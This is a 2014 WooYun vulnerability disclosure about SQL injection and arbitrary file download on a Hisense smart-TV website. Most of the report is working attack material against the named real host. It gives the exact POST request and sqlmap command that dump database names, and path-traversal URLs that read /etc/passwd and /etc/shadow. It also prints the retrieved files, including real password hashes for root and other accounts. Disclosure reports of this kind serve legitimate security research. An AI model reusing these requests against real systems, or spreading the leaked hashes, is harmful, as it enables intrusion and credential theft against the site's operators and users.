漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-085210
漏洞标题:海信某网站存在SQL注入及任意文件下载
相关厂商:hisense.com
漏洞作者: sunding
提交时间:2014-12-01 11:03
修复时间:2015-01-15 11:04
公开时间:2015-01-15 11:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经确认,细节仅向厂商公开
2014-12-11: 细节向核心白帽子及相关领域专家公开
2014-12-21: 细节向普通白帽子公开
2014-12-31: 细节向实习白帽子公开
2015-01-15: 细节向公众公开
简要描述:
详细说明:
海信某网站存在SQL注入及任意文件下载
漏洞证明:
1、POST型SQL注入
存在SQL注入的站点www.hismarttv.com/ajax/getHotAppList.jspx
POST /ajax/getHotAppList.jspx HTTP/1.1
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hismarttv.com/
Cookie: clientlanguage=zh_CN; JSESSIONID=99AB9560CEE6E74E5918D9FD358E7D29; APP_STORE_SELECT_MSG=82%2C003; _error_remaining=0
Host: www.hismarttv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
appId=9000000104031&count=7&deviceCode=&deviceType=003&PageNo=0&t=0.40499216807074845&type=3
注入点appId和deviceCode
以appId为例,将以上POST请求存入txt文本
Sqlmap py -r 2.txt -p "appId" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 62 HTTP(s) requ
ests:
---
Place: POST
Parameter: appId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: appId=9000000104031 AND 2182=2182&count=7&deviceCode=&deviceType=00
3&PageNo=0&t=0.40499216807074845&type=3
---
[10:00:39] [INFO] testing MySQL
[10:00:39] [INFO] confirming MySQL
[10:00:40] [INFO] the back-end DBMS is MySQL
web application technology: JSP, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[10:00:40] [INFO] fetching current user
[10:00:40] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:00:40] [INFO] retrieved: hitv@%
current user: 'hitv@%'
[10:00:50] [INFO] fetching current database
[10:00:50] [INFO] retrieved: asop
current database: 'asop'
[10:00:57] [INFO] fetching database names
[10:00:57] [INFO] fetching number of databases
[10:00:57] [INFO] retrieved: 8
[10:00:58] [INFO] retrieved: information_schema
[10:01:24] [INFO] retrieved: asop
[10:01:31] [INFO] retrieved: backup
[10:01:41] [INFO] retrieved: hitv
[10:01:47] [INFO] retrieved: #mysql50#lost+fouhd
[10:02:30] [INFO] retrieved: mysql
[10:02:36] [INFO] retrieved: performance_schema
[10:02:56] [INFO] retrieved: test
available databases [8]:
[*] `#mysql50#lost+fouhd`
[*] asop
[*] backup
[*] hitv
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
2、任意文件下载
http://www.hismarttv.com/DownloadServlet?contentId=217&downFile=../../../../../../../../../../etc/passwd&fileSize=&flag=1&userName=admin
http://www.hismarttv.com/DownloadServlet?contentId=217&downFile=../../../../../../../../../../etc/shadow&fileSize=&flag=1&userName=admin
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
games:x:12:100:Games account:/var/games:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false
hacluster:x:90:90:heartbeat processes:/var/lib/heartbeat/cores/hacluster:/bin/false
gdm:x:50:104:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
suse-ncc:x:102:105:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
hitv:x:888:800::/usr/local/fountain/hitv:/bin/csh
shinedb:x:999:800::/usr/local/fountain/shinedb:/bin/csh
nagios:x:1000:1000::/home/nagios:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
polkituser:x:103:107:PolicyKit:/var/run/PolicyKit:/bin/false
uuidd:x:104:109:User for uuidd:/var/run/uuidd:/bin/false
puppet:x:105:110:Puppet daemon:/var/lib/puppet:/bin/false
pulse:x:106:111:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
mysqlbackup:x:1001:100::/home/mysqlbackup:/bin/bash
root:$2y$10$wcDjIlJ2n3R3TrXLcIqZ6eoyzlZgxDEClVO5r5te0dFdMnM.bopbq:16310::::::
bin:*:15203::::::
daemon:*:15203::::::
lp:*:15203::::::
mail:*:15203::::::
news:*:15203::::::
uucp:*:15203::::::
games:*:15203::::::
man:*:15203::::::
wwwrun:*:15203::::::
ftp:*:15203::::::
nobody:*:15203::::::
at:!:15203:0:99999:7:::
sshd:!:15203:0:99999:7:::
postfix:!:15203:0:99999:7:::
ntp:!:15203:0:99999:7:::
hacluster:!:15203:0:99999:7:::
gdm:!:15203:0:99999:7:::
suse-ncc:!:15203:0:99999:7:::
hitv:$2a$10$d2gy9nH4pf1aeOBr5MYSNeKjmi4QoSWjx1S7yx/AvQ1w5..G7gfva:15223:0:99999:7:::
shinedb:$2a$10$DSyULJr5CTxi2f5IQeUM6.3Rpaj8hl5kFKSJs0m3/9nhuIWw/BTgm:15223:0:99999:7:::
nagios:!:15540:0:99999:7:::
polkituser:*:15874:0:99999:7:::
uuidd:*:15874:0:99999:7:::
puppet:*:15874:0:99999:7:::
pulse:*:15874:0:99999:7:::
mysqlbackup:$2y$10$o9qaQzFUzEt.hnW/AbTGqugKDIHZAeKd2igOjdbu.DYsPrD31kYtO:16286:0:99999:7:::
修复方案:
1、过滤特殊字符
2、限制目录访问
版权声明:转载请注明来源 sunding@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-12-01 13:28
厂商回复:
感谢您的安全报告,我们已安排专人进行跟踪修复。
最新状态:
暂无